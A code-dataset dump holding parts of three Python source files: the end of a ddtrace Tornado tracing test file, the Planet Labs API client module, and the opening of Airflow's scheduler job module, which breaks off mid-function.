# check non-propagation
assert request_span.trace_id != 1234
assert request_span.parent_id != 4567
assert request_span.get_metric(SAMPLING_PRIORITY_KEY) != 2
assert request_span.get_tag(ORIGIN_KEY) != "synthetics"
@TracerTestCase.run_in_subprocess(env_overrides=dict(DD_TORNADO_DISTRIBUTED_TRACING="False"))
def test_no_propagation_via_env_var(self):
# it should not propagate the HTTP context
headers = {
"x-datadog-trace-id": "1234",
"x-datadog-parent-id": "4567",
"x-datadog-sampling-priority": "2",
"x-datadog-origin": "synthetics",
}
response = self.fetch("/success/", headers=headers)
assert 200 == response.code
traces = self.pop_traces()
assert 1 == len(traces)
assert 1 == len(traces[0])
request_span = traces[0][0]
# simple sanity check on the span
assert "tornado.request" == request_span.name
assert_span_http_status_code(request_span, 200)
assert self.get_url("/success/") == request_span.get_tag(http.URL)
assert 0 == request_span.error
# check non-propagation
assert request_span.trace_id != 1234
assert request_span.parent_id != 4567
assert request_span.get_metric(SAMPLING_PRIORITY_KEY) != 2
assert request_span.get_tag(ORIGIN_KEY) != "synthetics"
class TestCustomTornadoWeb(TornadoTestCase):
"""
Ensure that Tornado web handlers are properly traced when using
a custom default handler.
"""
def get_settings(self):
return {
"default_handler_class": CustomDefaultHandler,
"default_handler_args": dict(status_code=400),
}
def test_custom_default_handler(self):
# it should trace any call that uses a custom default handler
response = self.fetch("/custom_handler/")
assert 400 == response.code
traces = self.pop_traces()
assert 1 == len(traces)
assert 1 == len(traces[0])
request_span = traces[0][0]
assert "tornado-web" == request_span.service
assert "tornado.request" == request_span.name
assert "web" == request_span.span_type
assert "tests.contrib.tornado.web.app.CustomDefaultHandler" == request_span.resource
assert "GET" == request_span.get_tag("http.method")
assert_span_http_status_code(request_span, 400)
assert self.get_url("/custom_handler/") == request_span.get_tag(http.URL)
assert 0 == request_span.error
| 39.986622 | 117 | 0.651096 |
05099511de6d6b1e2ed0f1f5277805d66fb05665 | 27,424 | py | Python | planet/api/client.py | Godron629/planet-client-python | 6e8fcb6028ba1de9d1ca25141d1402aba4344572 | [
"Apache-2.0"
] | null | null | null | planet/api/client.py | Godron629/planet-client-python | 6e8fcb6028ba1de9d1ca25141d1402aba4344572 | [
"Apache-2.0"
] | null | null | null | planet/api/client.py | Godron629/planet-client-python | 6e8fcb6028ba1de9d1ca25141d1402aba4344572 | [
"Apache-2.0"
] | 1 | 2018-01-28T05:11:20.000Z | 2018-01-28T05:11:20.000Z | # Copyright 2015 Planet Labs, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import json
from .dispatch import RequestsDispatcher
from . import auth
from .exceptions import (InvalidIdentity, APIException, NoPermission)
from . import models
from . import filters
class _Base(object):
'''High-level access to Planet's API.'''
def __init__(self, api_key=None, base_url='https://api.planet.com/',
workers=4):
'''
:param str api_key: API key to use. Defaults to environment variable.
:param str base_url: The base URL to use. Not required.
:param int workers: The number of concurrent download workers
'''
api_key = api_key or auth.find_api_key()
self.auth = api_key and auth.APIKey(api_key)
self.base_url = base_url
if not self.base_url.endswith('/'):
self.base_url += '/'
self.dispatcher = RequestsDispatcher(workers)
def shutdown(self):
self.dispatcher._asyncpool.executor.shutdown(wait=False)
def _url(self, path):
if path.startswith('http'):
url = path
else:
url = self.base_url + path
return url
def _request(self, path, body_type=models.JSON, params=None, auth=None):
return models.Request(self._url(path), auth or self.auth, params,
body_type)
def _get(self, path, body_type=models.JSON, params=None, callback=None):
# convert any JSON objects to text explicitly
for k, v in (params or {}).items():
if isinstance(v, dict):
params[k] = json.dumps(v)
request = self._request(path, body_type, params)
response = self.dispatcher.response(request)
if callback:
response.get_body_async(callback)
return response
def _download_many(self, paths, params, callback):
return [self._get(path, models.Image, params=params, callback=callback)
for path in paths]
def login(self, identity, credentials):
'''Login using email identity and credentials. Returns a JSON
object containing an `api_key` property with the user's API_KEY.
:param str identity: email
:param str credentials: password
:returns: JSON object (Python dict)
'''
result = self.dispatcher.session.post(self._url('v0/auth/login'),
json={
'email': identity,
'password': credentials
})
status = result.status_code
if status == 400:
raise APIException('invalid parameters, login process has changed')
elif status == 401:
# do our best to get something out to the user
msg = result.text
try:
msg = json.loads(result.text)['message']
finally:
raise InvalidIdentity(msg)
elif status != 200:
raise APIException('%s: %s' % (status, result.text))
jwt = result.text
payload = jwt.split('.')[1]
rem = len(payload) % 4
if rem > 0:
payload += '=' * (4 - rem)
payload = base64.urlsafe_b64decode(payload.encode('utf-8'))
return json.loads(payload.decode('utf-8'))
def _patch_stats_request(request):
'''If the request has no filter config, add one that should do what is
expected (include all items)
see: PE-11813
'''
filt = request.get('filter', {})
if not filt.get('config', None):
request['filter'] = filters.date_range('acquired',
gt='1970-01-01T00:00:00Z')
return request
class ClientV1(_Base):
'''ClientV1 provides basic low-level access to Planet's API. Only one
ClientV1 should be in existence for an application. The Client is thread
safe and takes care to avoid API throttling and also retry any throttled
requests. Most functions take JSON-like dict representations of API
request bodies. Return values are usually a subclass of
:py:class:`planet.api.models.Body`. Any exceptional http responses are
handled by translation to one of the :py:mod:`planet.api.exceptions`
classes.
'''
def _params(self, kw):
params = {}
if 'page_size' in kw:
params['_page_size'] = kw['page_size']
if 'sort' in kw and kw['sort']:
params['_sort'] = ''.join(kw['sort'])
if 'strict' in kw:
# This transforms a Python boolean into a JSON boolean
params['strict'] = json.dumps(kw['strict'])
return params
def create_search(self, request):
'''Create a new saved search from the specified request.
The request must contain a ``name`` property.
:param request: see :ref:`api-search-request`
:returns: :py:class:`planet.api.models.JSON`
:raises planet.api.exceptions.APIException: On API error.
'''
body = json.dumps(request)
return self.dispatcher.response(models.Request(
self._url('data/v1/searches/'), self.auth,
body_type=models.JSON, data=body, method='POST')).get_body()
def quick_search(self, request, **kw):
'''Execute a quick search with the specified request.
:param request: see :ref:`api-search-request`
:param `**kw`: See Options below
:returns: :py:class:`planet.api.models.Items`
:raises planet.api.exceptions.APIException: On API error.
:Options:
* page_size (int): Size of response pages
* sort (string): Sorting order in the form `field (asc|desc)`
'''
body = json.dumps(request)
params = self._params(kw)
return self.dispatcher.response(models.Request(
self._url('data/v1/quick-search'), self.auth, params=params,
body_type=models.Items, data=body, method='POST')).get_body()
def saved_search(self, sid, **kw):
'''Execute a saved search by search id.
:param sid string: The id of the search
:returns: :py:class:`planet.api.models.Items`
:raises planet.api.exceptions.APIException: On API error.
:Options:
* page_size (int): Size of response pages
* sort (string): Sorting order in the form `field (asc|desc)`
'''
path = 'data/v1/searches/%s/results' % sid
params = self._params(kw)
return self._get(self._url(path), body_type=models.Items,
params=params).get_body()
def get_searches(self, quick=False, saved=True):
'''Get searches listing.
:param quick bool: Include quick searches (default False)
:param quick saved: Include saved searches (default True)
:returns: :py:class:`planet.api.models.Searches`
:raises planet.api.exceptions.APIException: On API error.
'''
params = {}
if saved and not quick:
params['search_type'] = 'saved'
elif quick:
params['search_type'] = 'quick'
return self._get(self._url('data/v1/searches/'),
body_type=models.Searches, params=params).get_body()
def stats(self, request):
'''Get stats for the provided request.
:param request dict: A search request that also contains the 'interval'
property.
:returns: :py:class:`planet.api.models.JSON`
:raises planet.api.exceptions.APIException: On API error.
'''
# work-around for API bug
request = _patch_stats_request(request)
body = json.dumps(request)
return self.dispatcher.response(models.Request(
self._url('data/v1/stats'), self.auth,
body_type=models.JSON, data=body, method='POST')).get_body()
def get_assets(self, item):
'''Get the assets for the provided item representations.
Item representations are obtained from search requests.
:param request dict: An item representation from the API.
:returns: :py:class:`planet.api.models.JSON`
:raises planet.api.exceptions.APIException: On API error.
'''
assets_url = item['_links']['assets']
return self._get(assets_url).get_body()
def activate(self, asset):
'''Request activation of the specified asset representation.
Asset representations are obtained from :py:meth:`get_assets`.
:param request dict: An asset representation from the API.
:returns: :py:class:`planet.api.models.Body` with no response content
:raises planet.api.exceptions.APIException: On API error.
'''
activate_url = asset['_links']['activate']
return self._get(activate_url, body_type=models.Body).get_body()
def download(self, asset, callback=None):
'''Download the specified asset. If provided, the callback will be
invoked asynchronously. Otherwise it is up to the caller to handle the
response Body.
:param asset dict: An asset representation from the API
:param callback: An optional function to aysnchronsously handle the
download. See :py:func:`planet.api.write_to_file`
:returns: :py:Class:`planet.api.models.Response` containing a
:py:Class:`planet.api.models.Body` of the asset.
:raises planet.api.exceptions.APIException: On API error.
'''
download_url = asset['location']
return self._get(download_url, models.Body, callback=callback)
def get_item(self, item_type, id):
'''Get the an item response for the given item_type and id
:param item_type str: A valid item-type
:param id str: The id of the item
:returns: :py:Class:`planet.api.models.JSON`
:raises planet.api.exceptions.APIException: On API error.
'''
url = 'data/v1/item-types/%s/items/%s' % (item_type, id)
return self._get(url).get_body()
def get_assets_by_id(self, item_type, id):
'''Get an item's asset response for the given item_type and id
:param item_type str: A valid item-type
:param id str: The id of the item
:returns: :py:Class:`planet.api.models.JSON`
:raises planet.api.exceptions.APIException: On API error.
'''
url = 'data/v1/item-types/%s/items/%s/assets' % (item_type, id)
return self._get(url).get_body()
def get_mosaic_series(self, series_id):
'''Get information pertaining to a mosaics series
:returns: :py:Class:`planet.api.models.JSON`
'''
url = self._url('basemaps/v1/series/{}'.format(series_id))
return self._get(url, models.JSON).get_body()
def get_mosaics_for_series(self, series_id):
'''Get list of mosaics available for a series
:returns: :py:Class:`planet.api.models.Mosaics`
'''
url = self._url('basemaps/v1/series/{}/mosaics'.format(series_id))
return self._get(url, models.Mosaics).get_body()
def get_mosaics(self, name_contains=None):
'''Get information for all mosaics accessible by the current user.
:returns: :py:Class:`planet.api.models.Mosaics`
'''
params = {}
if name_contains:
params['name__contains'] = name_contains
url = self._url('basemaps/v1/mosaics')
return self._get(url, models.Mosaics, params=params).get_body()
def get_mosaic_by_name(self, name):
'''Get the API representation of a mosaic by name.
:param name str: The name of the mosaic
:returns: :py:Class:`planet.api.models.Mosaics`
:raises planet.api.exceptions.APIException: On API error.
'''
params = {'name__is': name}
url = self._url('basemaps/v1/mosaics')
return self._get(url, models.Mosaics, params=params).get_body()
def get_quads(self, mosaic, bbox=None):
'''Search for quads from a mosaic that are inside the specified
bounding box. Will yield all quads if no bounding box is specified.
:param mosaic dict: A mosaic representation from the API
:param bbox tuple: A lon_min, lat_min, lon_max, lat_max area to search
:returns: :py:Class:`planet.api.models.MosaicQuads`
:raises planet.api.exceptions.APIException: On API error.
'''
if bbox is None:
# Some bboxes can slightly exceed backend min/max latitude bounds
xmin, ymin, xmax, ymax = mosaic['bbox']
bbox = (max(-180, xmin), max(-85, ymin),
min(180, xmax), min(85, ymax))
url = mosaic['_links']['quads']
url = url.format(lx=bbox[0], ly=bbox[1], ux=bbox[2], uy=bbox[3])
return self._get(url, models.MosaicQuads).get_body()
def get_quad_by_id(self, mosaic, quad_id):
'''Get a quad response for a specific mosaic and quad.
:param mosaic dict: A mosaic representation from the API
:param quad_id str: A quad id (typically <xcoord>-<ycoord>)
:returns: :py:Class:`planet.api.models.JSON`
:raises planet.api.exceptions.APIException: On API error.
'''
path = 'basemaps/v1/mosaics/{}/quads/{}'.format(mosaic['id'], quad_id)
return self._get(self._url(path)).get_body()
def get_quad_contributions(self, quad):
'''Get information about which scenes contributed to a quad.
:param quad dict: A quad representation from the API
:returns: :py:Class:`planet.api.models.JSON`
:raises planet.api.exceptions.APIException: On API error.
'''
url = quad['_links']['items']
return self._get(url).get_body()
def download_quad(self, quad, callback=None):
'''Download the specified mosaic quad. If provided, the callback will
be invoked asynchronously. Otherwise it is up to the caller to handle
the response Body.
:param quad dict: A mosaic quad representation from the API
:param callback: An optional function to aysnchronsously handle the
download. See :py:func:`planet.api.write_to_file`
:returns: :py:Class:`planet.api.models.Response` containing a
:py:Class:`planet.api.models.Body` of the asset.
:raises planet.api.exceptions.APIException: On API error.
'''
try:
download_url = quad['_links']['download']
except KeyError:
msg = 'You do not have download permissions for quad {}'
raise NoPermission(msg.format(quad['id']))
return self._get(download_url, models.Body, callback=callback)
def check_analytics_connection(self):
'''
Validate that we can use the Analytics API. Useful to test connectivity
to test environments.
:returns: :py:Class:`planet.api.models.JSON`
'''
return self._get(self._url('analytics/health')).get_body()
def wfs_conformance(self):
'''
Details about WFS3 conformance
:returns: :py:Class:`planet.api.models.JSON`
'''
return self._get(self._url('analytics/conformance')).get_body()
def list_analytic_subscriptions(self, feed_id):
'''
Get subscriptions that the authenticated user has access to
:param feed_id str: Return subscriptions associated with a particular
feed only.
:raises planet.api.exceptions.APIException: On API error.
:returns: :py:Class:`planet.api.models.Subscriptions`
'''
params = {'feedID': feed_id}
url = self._url('analytics/subscriptions')
return self._get(url, models.Subscriptions, params=params).get_body()
def get_subscription_info(self, subscription_id):
'''
Get the information describing a specific subscription.
:param subscription_id:
:raises planet.api.exceptions.APIException: On API error.
:returns: :py:Class:`planet.api.models.JSON`
'''
url = self._url('analytics/subscriptions/{}'.format(subscription_id))
return self._get(url, models.JSON).get_body()
def list_analytic_feeds(self, stats):
'''
Get collections that the authenticated user has access to
:raises planet.api.exceptions.APIException: On API error.
:returns: :py:Class:`planet.api.models.Feeds`
'''
params = {'stats': stats}
url = self._url('analytics/feeds')
return self._get(url, models.Feeds, params=params).get_body()
def get_feed_info(self, feed_id):
'''
Get the information describing a specific collection.
:param subscription_id:
:raises planet.api.exceptions.APIException: On API error.
:returns: :py:Class:`planet.api.models.JSON`
'''
url = self._url('analytics/feeds/{}'.format(feed_id))
return self._get(url, models.JSON).get_body()
def list_analytic_collections(self):
'''
Get collections that the authenticated user has access to
:raises planet.api.exceptions.APIException: On API error.
:returns: :py:Class:`planet.api.models.WFS3Collections`
'''
params = {}
url = self._url('analytics/collections')
return self._get(url, models.WFS3Collections,
params=params).get_body()
def get_collection_info(self, subscription_id):
'''
Get the information describing a specific collection.
:param subscription_id:
:raises planet.api.exceptions.APIException: On API error.
:returns: :py:Class:`planet.api.models.JSON`
'''
url = 'analytics/collections/{}'.format(subscription_id)
return self._get(self._url(url), models.JSON).get_body()
def list_collection_features(self,
subscription_id,
bbox=None,
time_range=None,
before=None,
after=None,
):
'''
List features for an analytic subscription.
:param subscription_id:
:param time_range str: ISO format datetime interval.
:param bbox tuple: A lon_min, lat_min, lon_max, lat_max area to search
:param before str: return features published before item with given ID
:param after str: return features published after item with given ID
:raises planet.api.exceptions.APIException: On API error.
:returns: :py:Class:`planet.api.models.WFS3Features`
'''
params = {}
if bbox:
params['bbox'] = ','.join([str(b) for b in bbox])
if time_range:
params['time'] = time_range
if before:
params['before'] = before
if after:
params['after'] = after
url = self._url('analytics/collections/{}/items'.format(
subscription_id))
return self._get(url, models.WFS3Features, params=params).get_body()
def get_associated_resource_for_analytic_feature(self,
subscription_id,
feature_id,
resource_type):
'''
Get resource associated with some feature in an analytic subscription.
Response might be JSON or a TIF, depending on requested resource.
:param subscription_id str: ID of subscription
:param feature_id str: ID of feature
:param resource_type str: Type of resource to request.
:raises planet.api.exceptions.APIException: On API error or resource
type unavailable.
:returns: :py:Class:`planet.api.models.JSON` for resource type
`source-image-info`, but can also return
:py:Class:`planet.api.models.Response` containing a
:py:Class:`planet.api.models.Body` of the resource.
'''
url = self._url(
'analytics/collections/{}/items/{}/resources/{}'.format(
subscription_id, feature_id, resource_type))
response = self._get(url).get_body()
return response
def get_orders(self):
'''Get information for all pending and completed order requests for
the current user.
:returns: :py:Class:`planet.api.models.Orders`
'''
# TODO filter 'completed orders', 'in progress orders', 'all orders'?
url = self._url('compute/ops/orders/v2')
orders = (self._get(url, models.Orders).get_body())
return orders
def get_individual_order(self, order_id):
'''Get order request details by Order ID.
:param order_id str: The ID of the Order
:returns: :py:Class:`planet.api.models.Order`
:raises planet.api.exceptions.APIException: On API error.
'''
url = self._url('compute/ops/orders/v2/{}'.format(order_id))
return self._get(url, models.Order).get_body()
def cancel_order(self, order_id):
'''Cancel a running order by Order ID.
:param order_id str: The ID of the Order to cancel
:returns: :py:Class:`planet.api.models.Order`
:raises planet.api.exceptions.APIException: On API error.
'''
url = self._url('compute/ops/orders/v2/{}'.format(order_id))
return self.dispatcher.response(models.Request(url, self.auth,
body_type=models.Order,
method='PUT')
).get_body()
def create_order(self, request):
'''Create an order.
:param asset:
:returns: :py:Class:`planet.api.models.Response` containing a
:py:Class:`planet.api.models.Body` of the asset.
:raises planet.api.exceptions.APIException: On API error.
'''
url = self._url('compute/ops/orders/v2')
body = json.dumps(request)
return self.dispatcher.response(models.Request(url, self.auth,
body_type=models.Order,
data=body,
method='POST')
).get_body()
def download_order(self, order_id, callback=None):
'''Download all items in an order.
:param order_id: ID of order to download
:returns: :py:Class:`planet.api.models.Response` containing a
:py:Class:`planet.api.models.Body` of the asset.
:raises planet.api.exceptions.APIException: On API error.
'''
url = self._url('compute/ops/orders/v2/{}'.format(order_id))
order = self._get(url, models.Order).get_body()
locations = order.get_locations()
return [self.download_location(location, callback=callback)
for location in locations]
def download_location(self, location, callback=None):
'''Download an item in an order.
:param location: location URL of item
:returns: :py:Class:`planet.api.models.Response` containing a
:py:Class:`planet.api.models.Body` of the asset.
:raises planet.api.exceptions.APIException: On API error.
'''
return self._get(location, models.JSON, callback=callback)
def get_delivery_subscriptions(self):
'''Get information for all subscriptions for the current user, including
cancelled subscriptions
:returns: :py:Class:`planet.api.models.PublishingSubscriptions`
'''
return self._get(
self._url('subscriptions/v1/'),
models.DeliverySubscriptions
).get_body()
def get_individual_delivery_subscription(self, subscription_id):
'''Get subscription details by ID
:param subscription_id str: The ID of the Subscription
:returns: :py:class:`planet.api.models.JSON`
:raises planet.api.exceptions.APIException: On API error.
'''
return self._get(
self._url('subscriptions/v1/{}'.format(subscription_id)),
body_type=models.JSON
).get_body()
def cancel_delivery_subscription(self, subscription_id):
'''Cancel a running subscription by subscription ID
Subscriptions can only be cancelled in Pending or Running State.
:param subscription_id str: The ID of the Subscription
:returns: :py:Class:`planet.api.models.DeliverySubscription`
:raises planet.api.exceptions.APIException: On API error.
'''
return self.dispatcher.response(
models.Request(
self._url('subscriptions/v1/{}/cancel'.format(subscription_id)),
self.auth,
body_type=models.Body,
method='POST'
)
).get_body()
def create_delivery_subscription(self, request):
'''Create a subscription.
:param request: subscription request
:returns: :py:class:`planet.api.models.JSON`
:raises planet.api.exceptions.APIException: On API error.
'''
return self.dispatcher.response(
models.Request(
self._url('subscriptions/v1/'),
self.auth,
body_type=models.JSON,
data=json.dumps(request),
method='POST'
)
).get_body()
def get_delivery_subscription_results(self, subscription_id, status=None, created=None, updated=None,
completed=None):
'''Get results for a given subscription
:param subscription_id str: Subscription ID
:param status str: Enum: "created" "queued" "processing" "failed" "success"
:param created str: Only return results that were created in the given interval or instant.
:param updated str: Only return results that were updated in the given interval or instant.
:param completed str: Only return results that were completed in the given interval or instant.
:returns :py:class:`planet.api.models.JSON`
:raises planet.api.exceptions.APIException: On API error.
'''
params = {}
if status:
params['status'] = status
if created:
params['created'] = created
if updated:
params['updated'] = updated
if completed:
params['completed'] = completed
return self._get(
self._url('subscriptions/v1/{}/results'.format(subscription_id)),
body_type=models.JSON,
params=params,
).get_body()
| 40.809524 | 105 | 0.607825 |
1f8940a43a3fb6f69f1e349133c8b608d0e14bfd | 66,603 | py | Python | airflow/jobs/scheduler_job.py | ganeshsrirams/airflow | b8c02632136320b8379956411134246cd2f6eb47 | [
"Apache-2.0"
] | null | null | null | airflow/jobs/scheduler_job.py | ganeshsrirams/airflow | b8c02632136320b8379956411134246cd2f6eb47 | [
"Apache-2.0"
] | null | null | null | airflow/jobs/scheduler_job.py | ganeshsrirams/airflow | b8c02632136320b8379956411134246cd2f6eb47 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from datetime import timedelta
from time import sleep
from typing import List, Set
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.orm.session import make_transient
from airflow import executors, models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException
from airflow.jobs.base_job import BaseJob
from airflow.models import DAG, DagRun, SlaMiss, errors
from airflow.stats import Stats
from airflow.ti_deps.dep_context import SCHEDULEABLE_STATES, SCHEDULED_DEPS, DepContext
from airflow.ti_deps.deps.pool_slots_available_dep import STATES_TO_COUNT_AS_RUNNING
from airflow.utils import asciiart, helpers, timezone
from airflow.utils.dag_processing import (
AbstractDagFileProcessor, DagFileProcessorAgent, SimpleDag, SimpleDagBag, SimpleTaskInstance,
list_py_file_paths,
)
from airflow.utils.db import provide_session
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.state import State
class DagFileProcessor(AbstractDagFileProcessor, LoggingMixin):
"""Helps call SchedulerJob.process_file() in a separate process.
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: unicode
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_id_white_list: If specified, only look at these DAG ID's
:type dag_id_white_list: list[unicode]
:param zombies: zombie task instances to kill
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(self, file_path, pickle_dags, dag_id_white_list, zombies):
self._file_path = file_path
# The process that was launched to process the given .
self._process = None
self._dag_id_white_list = dag_id_white_list
self._pickle_dags = pickle_dags
self._zombies = zombies
# The result of Scheduler.process_file(file_path).
self._result = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time = None
# This ID is use to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessor.class_creation_counter
DagFileProcessor.class_creation_counter += 1
@property
def file_path(self):
return self._file_path
@staticmethod
def _run_file_processor(result_channel,
file_path,
pickle_dags,
dag_id_white_list,
thread_name,
zombies):
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: unicode
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_id_white_list: if specified, only examine DAG ID's that are
in this list
:type dag_id_white_list: list[unicode]
:param thread_name: the name to use for the process that is launched
:type thread_name: unicode
:return: the process that was launched
:rtype: multiprocessing.Process
:param zombies: zombie task instances to kill
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
"""
# This helper runs in the newly created process
log = logging.getLogger("airflow.processor")
stdout = StreamLogWriter(log, logging.INFO)
stderr = StreamLogWriter(log, logging.WARN)
set_context(log, file_path)
setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))
try:
# redirect stdout/stderr to log
sys.stdout = stdout
sys.stderr = stderr
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
start_time = time.time()
log.info("Started process (PID=%s) to work on %s",
os.getpid(), file_path)
scheduler_job = SchedulerJob(dag_ids=dag_id_white_list, log=log)
result = scheduler_job.process_file(file_path,
zombies,
pickle_dags)
result_channel.send(result)
end_time = time.time()
log.info(
"Processing %s took %.3f seconds", file_path, end_time - start_time
)
except Exception:
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
result_channel.close()
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
def start(self):
"""
Launch the process and start processing the DAG.
"""
self._parent_channel, _child_channel = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
self.file_path,
self._pickle_dags,
self._dag_id_white_list,
"DagFileProcessor{}".format(self._instance_id),
self._zombies
),
name="DagFileProcessor{}-Process".format(self._instance_id)
)
self._start_time = timezone.utcnow()
self._process.start()
def kill(self):
"""
Kill the process launched to process the file, and ensure consistent state.
"""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
# The queue will likely get corrupted, so remove the reference
self._result_queue = None
self._kill_process()
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
self._process.join(5)
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self):
if self._process.is_alive():
self.log.warning("Killing PID %s", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
@property
def pid(self):
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self):
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
pass
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self):
"""
:return: result of running SchedulerJob.process_file()
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self):
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
class SchedulerJob(BaseJob):
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: unicode
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[unicode]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: unicode
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {
'polymorphic_identity': 'SchedulerJob'
}
heartrate = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
dag_id=None,
dag_ids=None,
subdir=settings.DAGS_FOLDER,
num_runs=conf.getint('scheduler', 'num_runs'),
processor_poll_interval=conf.getfloat('scheduler', 'processor_poll_interval'),
do_pickle=False,
log=None,
*args, **kwargs):
# for BaseJob compatibility
self.dag_id = dag_id
self.dag_ids = [dag_id] if dag_id else []
if dag_ids:
self.dag_ids.extend(dag_ids)
self.subdir = subdir
self.num_runs = num_runs
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super().__init__(*args, **kwargs)
self.max_threads = conf.getint('scheduler', 'max_threads')
if log:
self._log = log
self.using_sqlite = False
if 'sqlite' in conf.get('core', 'sql_alchemy_conn'):
self.using_sqlite = True
self.max_tis_per_query = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent = None
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
"""
Helper method to clean up processor_agent to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier=None):
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).seconds < scheduler_health_check_threshold
)
@provide_session
def manage_slas(self, dag, session=None):
"""
Finding all tasks that have SLAs defined, and sending alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any([isinstance(ti.sla, timedelta) for ti in dag.tasks]):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
TI = models.TaskInstance
sq = (
session
.query(
TI.task_id,
func.max(TI.execution_date).label('max_ti'))
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(or_(
TI.state == State.SUCCESS,
TI.state == State.SKIPPED))
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id).subquery('sq')
)
